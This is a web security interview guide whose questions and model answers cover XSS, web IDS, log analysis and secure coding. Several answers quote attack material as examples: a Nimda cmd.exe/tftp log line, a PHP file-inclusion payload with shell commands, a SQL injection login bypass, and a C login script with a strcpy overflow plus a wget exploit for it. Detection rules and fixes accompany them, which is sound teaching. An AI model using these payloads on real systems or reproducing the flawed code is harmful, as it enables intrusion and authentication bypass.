
Web Security Interview Questions

The goal of this document is to provide appropriate questions for HR/Managers to pose to individuals who are applying for web security related positions. These questions do not have right or wrong answers, but rather spark relevant conversation between the applicant and the hiring staff.

Entry Level Questions

1. What do you see as the most critical and current threats affecting Internet accessible websites?

Goal of question - To gauge the applicant's knowledge of current web related threats. Topics such as Denial of Service, Brute Force, Buffer Overflows, and Input Validation are all relevant topics. Hopefully they will mention information provided by web security organizations such as the Web Application Security Consortium (WASC) or the Open Web Application Security Project (OWASP).

2. What online resources do you use to keep abreast of web security issues? Can you give an example of a recent web security vulnerability or threat?

Goal of question - Determine if the applicant utilizes computer security resources such as CERT, SANS Internet Storm Center or ICAT. Email lists such as securityfocus, bugtraq, SANS @RISK, etc. are also good resources. Recent examples of threats will vary depending on current events, but issues such as new web based worms (PHP Santy Worm) or applications which are in wide use (awstats scripts) are acceptable.

3. What do you see as challenges to successfully deploying/monitoring web intrusion detection?

Goal of question - We are attempting to see if the applicant has a wide knowledge of web security monitoring and IDS issues such as:

o Limitations of NIDS for web monitoring (SSL, semantic issues with understanding HTTP)
o Proper logging - increasing the verboseness of logging (Mod_Security audit_log)
o Remote Centralized Logging
o Alerting Mechanisms
o Updating Signatures/Policies

4. What is your definition of the term "Cross-Site Scripting"? What is the potential impact to servers and clients?

Goal of question - This question will determine if the applicant is well versed in the terminology used in web security. The applicant needs to be able to articulate highly technological topics to a wide audience. The second question will help to verify that the applicant fully understands how XSS attacks work and the impact to client information. WASC has a web security glossary of terms that may be of help - http://www.webappsec.org/glossary.html

Cross-Site Scripting: (Acronym XSS) An attack technique that forces a web site to echo client-supplied data, which executes in a user's web browser. When a user is Cross-Site Scripted, the attacker will have access to all web browser content (cookies, history, application version, etc). XSS attacks do not typically directly target the web server or application, but are rather aimed at the client. The web server is merely used as a conduit for the XSS data to be presented to the end client. See also "Client-Side Scripting".

5. What are the most important steps you would recommend for securing a new web server? Web application?

Goal of question - Once again, there is no right or wrong answer, however we are interested in what the applicant views as important.

Web Server Security:
o Update/Patch the web server software
o Minimize the server functionality - disable extra modules
o Delete default data/scripts
o Increase logging verboseness
o Update Permissions/Ownership of files

Web Application Security:
o Make sure Input Validation is enforced within the code - Security QA testing
o Configure the application to display generic error messages
o Implement a software security policy
o Remove or protect hidden files and directories

Advanced Level Questions

1. Imagine that we are running an Apache reverse proxy server and one of the servers we are proxying for is a Windows IIS server. What does the log entry suggest has happened? What would you do in response to this entry?

68.48.142.117 - - [09/Mar/2004:22:22:57 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 566 "-" "-"
68.48.142.117 - - [09/Mar/2004:22:23:48 -0500] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%2068.48.142.117%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.0" 200 566 "-" "-"

Goal of question - To see if the applicant is fluent at reading web server log files in the Common Log Format (CLF). In this scenario, the client system (68.48.142.117) is infected with the Nimda worm. These requests will not affect our Apache proxy server since this is a Microsoft vulnerability. While it does not impact Apache, the logs do indicate that the initial request was successful (status code of 200). The Nimda worm will only send the level 2 request (trying to use Trivial FTP to infect the target) if the initial request is successful. Depending on the exact proxying rules in place, it would be a good idea to inspect the internal IIS server to verify that it has not been compromised.

If you were not using Apache as the reverse proxy, what Microsoft application/tool could you use to mitigate this attack?

You could use either Microsoft's Internet and Security Acceleration (ISA) server as a front-end proxy or implement URLScan on the target IIS server. The urlscan.ini file has the AllowDotInPath directive which will block directory traversal attempts.

2. You are engaged in a penetration test where you are attempting to gain access to a protected location. You are presented with this login screen:
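The two-stage pattern described above (cmd.exe probe, then a tftp fetch only after a 200) can be checked mechanically when reviewing proxy logs. The following C program is an added example and not part of the original document: it parses one CLF line, flags the cmd.exe probe, and escalates when the proxy returned 200 and the tftp stage appears. The sample lines are the two from the question; the stage names are assumed.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Stages of the Nimda pattern described above: a cmd.exe probe, then a
 * tftp fetch that the worm only sends after the probe returned 200. */
enum nimda_stage { NIMDA_NONE = 0, NIMDA_PROBE = 1, NIMDA_PROBE_OK = 2, NIMDA_TFTP_OK = 3 };

/* Pull the quoted request line and the status code out of a CLF entry.
 * Returns 0 on success, -1 if the line does not look like CLF. */
static int parse_clf(const char *line, char *req, size_t reqlen, int *status) {
    const char *open = strchr(line, '"');
    if (open == NULL) return -1;
    const char *close = strchr(open + 1, '"');
    if (close == NULL) return -1;
    size_t n = (size_t)(close - open - 1);
    if (n >= reqlen) n = reqlen - 1;
    memcpy(req, open + 1, n);
    req[n] = '\0';
    *status = atoi(close + 1);          /* status code follows the closing quote */
    return *status > 0 ? 0 : -1;
}

/* Classify one access-log line; on a reverse proxy a 200 means the backend
 * (the IIS server) answered the request, so it needs inspection. */
enum nimda_stage classify_nimda(const char *line) {
    char req[512];
    int status;
    if (parse_clf(line, req, sizeof req, &status) != 0) return NIMDA_NONE;
    if (strstr(req, "cmd.exe") == NULL) return NIMDA_NONE;
    if (status != 200) return NIMDA_PROBE;                 /* probe refused: no impact */
    if (strstr(req, "tftp") != NULL) return NIMDA_TFTP_OK;  /* stage 2 after a success */
    return NIMDA_PROBE_OK;
}

int main(void) {
    /* Sample lines: the two entries from the question above */
    const char *lines[] = {
        "68.48.142.117 - - [09/Mar/2004:22:22:57 -0500] \"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0\" 200 566 \"-\" \"-\"",
        "68.48.142.117 - - [09/Mar/2004:22:23:48 -0500] \"GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%2068.48.142.117%20GET%20cool.dll%20c:\\httpodbc.dll HTTP/1.0\" 200 566 \"-\" \"-\"",
    };
    for (size_t i = 0; i < 2; i++)
        printf("line %zu: stage %d\n", i + 1, (int)classify_nimda(lines[i]));
    return 0;
}
```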

What are some examples of how you would attempt to gain access?

Goal of question - Determine if the applicant has a wide knowledge of different authentication vulnerabilities. They may attempt default usernames/passwords or attempt SQL Injection queries that provide an SQL true statement (such as ' OR 1=1). If they provide SQL examples, then offer them the following Error document information and ask them what this indicates.

ODBC Error Code = 37000 (Syntax error or access violation)
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 4: Incorrect syntax near '='.
Data Source = "ECommerceTheArch.SupportB"
SQL = "SELECT QuickJump_Items.ItemId FROM QuickJump_Items WHERE QuickJump_Items.ItemId = '' AND QuickJumpId = "
The error occurred while processing an element with a general identifier of (CFQUERY), occupying document position (1:1) to (1:42) in the template file E:\Inetpub\clients\login\http\ailment.cfm
The specific sequence of files included or processed is: E:\INETPUB\CLIENTS\LOGIN\HTTP\AILMENT.CFM

This error message indicates that the target web application is running Microsoft SQL and discloses directory structures.

3. What application generated the log file entry below? What type of attack is this? Assuming the index.php program is vulnerable, was this attack successful?

========================================
Request: 200.158.8.207 - - [09/Oct/2004:19:40:46 --0400] "POST /index.php HTTP/1.1" 403 743
Handler: cgi-script
----------------------------------------
POST /index.php HTTP/1.1
Host: www.foo.com
Connection: Keep-alive
Accept: */*
Accept-Language: en-us
Content-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla 4.0 (Linux)
Content-Length: 65
X-Forwarded-For: 200.158.8.207
mod_security-message: Access denied with code 403. Pattern match "uname\x20-a" at POST_PAYLOAD
mod_security-action: 403

65
lid=http://th3.ownz.p5.org.uk/lila.jpg?&cmd=cd /tmp;id;lsuname -a

Goal of question - To verify that the applicant can interpret various web log files, identify attacks and possible impacts. The Mod_Security Apache module generated this data in the audit_log file. The log entry indicates that an attacker is attempting to exploit a PHP file inclusion vulnerability in the index.php script. The commands being passed are in the POST PAYLOAD of the request. This attack was not successful for the following two reasons:

o The mod_security-message header indicates that Mod_Security blocked this request based on a converted Snort web-attack rule when it identified the "uname -a" data in the POST PAYLOAD.
o The attacker also made a typo in the OS commands being passed in the POST PAYLOAD. She did not include a semicolon ";" between the ls and uname commands. The target host would fail to execute the "lsuname" command.
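To make the second reason concrete when reviewing an audit_log entry, the following C helper is an added example (not part of the original document): it splits the cmd= value of the POST payload on ';' the way the target shell would, so the missing semicolon shows up as one "lsuname -a" command and no command named uname. The payload string is the one from the audit log above; function names are assumed.

```c
#include <stdio.h>
#include <string.h>

#define MAX_CMDS 8
#define CMD_LEN 64

/* Split the cmd= parameter of the POST payload on ';' into the commands the
 * target shell would run. Returns the count (0 if no cmd= parameter); leading
 * blanks are dropped and empty commands (trailing ';') are skipped. */
int split_commands(const char *payload, char cmds[MAX_CMDS][CMD_LEN]) {
    const char *p = strstr(payload, "cmd="); int n = 0;
    if (p == NULL) return 0;
    p += strlen("cmd=");
    while (n < MAX_CMDS) {
        while (*p == ' ') p++;
        const char *end = strchr(p, ';');
        size_t len = end ? (size_t)(end - p) : strlen(p);
        if (len >= CMD_LEN) len = CMD_LEN - 1;
        memcpy(cmds[n], p, len);
        cmds[n][len] = '\0';
        if (len > 0) n++;
        if (end == NULL) break;
        p = end + 1;
    }
    return n;
}

int payload_command_count(const char *payload) {
    char cmds[MAX_CMDS][CMD_LEN];
    return split_commands(payload, cmds);
}

/* 1 if one of the commands has prog as its program name (first word). */
int payload_runs_program(const char *payload, const char *prog) {
    char cmds[MAX_CMDS][CMD_LEN];
    int n = split_commands(payload, cmds);
    size_t plen = strlen(prog);
    for (int i = 0; i < n; i++)
        if (strncmp(cmds[i], prog, plen) == 0 &&
            (cmds[i][plen] == ' ' || cmds[i][plen] == '\0'))
            return 1;
    return 0;
}

int main(void) {
    /* Sample payload: the POST body from the audit_log entry above */
    const char *payload = "lid=http://th3.ownz.p5.org.uk/lila.jpg?&cmd=cd /tmp;id;lsuname -a";
    printf("commands: %d, runs uname: %d\n", payload_command_count(payload), payload_runs_program(payload, "uname"));
    return 0;
}
```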

4. One of your web servers is logging multiple requests similar to the following:

201.1.199.155 - - [26/Dec/2004:01:55:48 -0500] "PUT /hacked.htm HTTP/1.0" 403 769 "-" "Microsoft Data Access Internet Publishing Provider DAV 1.1"

What does this log entry indicate? How could you identify what the contents are of the "hacked.htm" file that the attacker is trying to upload?

Goal of question - Determine if the applicant can identify both the attack (a web defacement attempt using the HTTP PUT Method), as well as the logging limitations of CLF. In this type of attack, the defacement text is sent in the request body and not on the URL Request line. In order to identify this data, a network sniffing application would need to be utilized. An application such as Snort could be used with a custom rule to identify this activity. Here is an example rule -

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"LOCAL Put attempt"; flow:to_server,established; tag:session,50,packets; pcre:"/^PUT /A"; sid:3000001; rev:1;)

5. You have been asked to review the source code for a compiled script that is being used to validate logon credentials for a web application. The file is called "logon_validate" and a typical logon request looks like this -

"GET /cgi-bin/logon_validate?login=test&password=test"

The source code is shown below. The #include lines and the GOOD_USER/GOOD_PASS placeholder definitions are added so that the listing compiles, and the query string is read from the CGI environment where the original listing shows a ****QUERY_STRING**** placeholder; the logic, including the unbounded strcpy() calls, is unchanged.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define GOOD_USER "admin"   /* placeholder: defined elsewhere in the original */
#define GOOD_PASS "secret"  /* placeholder: defined elsewhere in the original */

void show_error(void) {
    // AUTHENTICATION ERROR
    exit(-1);
}

int main(int argc, char **argv) {
    char error_on_auth='1';   /* '1' = not authenticated; declared right before user[] */
    char user[128];
    char pass[128];
    char *ch_ptr_begin;
    char *ch_ptr_end;
    char *query_string = getenv("QUERY_STRING");   /* ****QUERY_STRING**** in the original */
    if (query_string==NULL)
        show_error();

    /**********************************/
    /* Get Username from Query String */
    /**********************************/
    ch_ptr_begin=(char *)strstr(query_string,"login=");
    if (ch_ptr_begin==NULL)
        show_error();
    ch_ptr_begin+=6;
    ch_ptr_end=(char *)strstr(ch_ptr_begin,"&");
    if (ch_ptr_end==NULL)
        show_error();
    *(ch_ptr_end++)='\0';
    strcpy(user,ch_ptr_begin);   /* unbounded copy into a 128-byte buffer */

    /**********************************/
    /* Get Password from Query String */
    /**********************************/
    ch_ptr_begin=(char *)strstr(ch_ptr_end,"password=");
    if (ch_ptr_begin==NULL)
        show_error();
    ch_ptr_begin+=9;
    ch_ptr_end=(char *)strstr(ch_ptr_begin,"&");
    if (ch_ptr_end!=NULL)
        *(ch_ptr_end++)='\0';
    strcpy(pass,ch_ptr_begin);   /* same unbounded copy */

    if ((strcmp(user,GOOD_USER)==0) && (strcmp(pass,GOOD_PASS)==0))
        error_on_auth='0';

    if (error_on_auth=='0') {
        // AUTHENTICATION OK!!
    } else {
        // AUTHENTICATION ERROR
        show_error();
    }

    // return(0); hehe could be evil ;PPPPP
    exit(0);
}

This pseudo-code is taken from the NGSec Web Auth Games http://quiz.ngsec.biz:8080/game1/level5/replicant.php

Do you see any problems with this script? How could an attacker exploit this script to bypass the authentication mechanisms in this script? What are some mitigation options?

Goal of question - This is most likely the most complex question being asked during the interview due to the fact that the applicant will need to apply multiple layers of analysis, including both the attacker and defender perspectives. Reference "Smashing The Stack For Fun And Profit" for technical details - http://www.phrack.org/phrack/49/P49-14

The security issue with this script has to do with a buffer overflow problem in the way that the script is using the "error_on_auth" condition. The error_on_auth condition is initially declared to be "1" which means that the user is not authenticated. The "user" condition was declared directly after the error_on_auth and has been allocated 128 bytes. Due to the ordering of the declaration of the error_on_auth and user parameters, they occupy adjacent locations on the running stack (the exact layout is compiler-dependent, so it would be confirmed against the compiled binary). The result is that if the attacker submits a username that is 129 bytes (with the last byte being "0"), they can overwrite the error_on_auth data. A Unix command such as the following would achieve this goal -

http://www.companyx.com/cgi-bin/validate_logon?logon=000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

or
$ wget http://www.companyx.com/cgi-bin/validate_logon?logon=`perl -e 'print "0"x129'`

Mitigation options include the following:

o Update the validate_logon source code to fix the problem, such as using strncpy() instead of strcpy().
o If the source code could not be updated, then security filters would need to be implemented on the web server. Using Mod_Security, you could implement some security filters for the "validate_logon" URL such as these:

  o Only allow letters in the username argument. This would prevent the client from overwriting the error_on_auth data with a zero.

<Location /cgi-bin/validate_logon>
SecFilterSelective ARG_LOGIN "!^[a-zA-Z]"
</Location>

Note that this pattern only rejects values that do not begin with a letter; requiring letters throughout the value needs an end anchor as well, for example "!^[a-zA-Z]+$".

  o You could also add another rule to restrict the size of the username/password arguments to be less than 129 characters.

<Location /cgi-bin/validate_logon>
SecFilterSelective ARG_LOGIN "!^[a-zA-Z]"
SecFilterSelective ARG_LOGIN|ARG_PASSWORD ".{129,}"
</Location>
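The source-code fix listed first above (replacing the unbounded strcpy() with a length-checked copy) looks like the following. This is an added example and not the NGSec code or the original document's: it keeps the same 128-byte buffers and query-string format, rejects a value that does not fit instead of truncating it, and returns the authentication decision as a value rather than storing a flag next to the buffers; GOOD_USER and GOOD_PASS are placeholder credentials.

```c
#include <stdio.h>
#include <string.h>

#define MAXLEN 128                  /* same buffer size as the original script */
#define GOOD_USER "admin"           /* placeholder credentials (assumed) */
#define GOOD_PASS "s3cret"

/* Copy the value of key (e.g. "login=") from the query string into dst.
 * Where the original used strcpy(), an over-long value is rejected here
 * rather than truncated or written past the end of the buffer.
 * Returns 0 on success, -1 if the key is absent or the value does not fit. */
static int get_param(const char *query, const char *key, char *dst, size_t dstlen) {
    const char *p = strstr(query, key);
    if (p == NULL) return -1;
    p += strlen(key);
    const char *end = strchr(p, '&');
    size_t len = end ? (size_t)(end - p) : strlen(p);
    if (len >= dstlen) return -1;            /* no room for the terminator */
    memcpy(dst, p, len);
    dst[len] = '\0';
    return 0;
}

/* 1 if the credentials are valid, else 0. The decision is a return value,
 * not a flag stored beside the buffers, so there is nothing to overwrite. */
int validate_logon(const char *query) {
    char user[MAXLEN], pass[MAXLEN];
    if (get_param(query, "login=", user, sizeof user) != 0) return 0;
    if (get_param(query, "password=", pass, sizeof pass) != 0) return 0;
    return strcmp(user, GOOD_USER) == 0 && strcmp(pass, GOOD_PASS) == 0;
}

/* Replays the 129-byte all-zero username from the question; 1 means rejected. */
int overlong_login_rejected(void) {
    char query[256];
    snprintf(query, sizeof query, "login=%0129d&password=%s", 0, GOOD_PASS);
    return validate_logon(query) == 0;
}

int main(void) {
    printf("good creds: %d\n", validate_logon("login=admin&password=s3cret"));
    printf("bad creds: %d\n", validate_logon("login=admin&password=wrong"));
    printf("129-byte login rejected: %d\n", overlong_login_rejected());
    return 0;
}
```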

A web application firewall (WAF) device could be implemented on the network to protect the entire web site. These devices have positive policy capability that should identify these types of attacks as "anomalous" and deny them. A brief listing of WAF vendors include Teros, Netcontinuum, Imperva, Watchfire, Breach, Axiliance, and others.
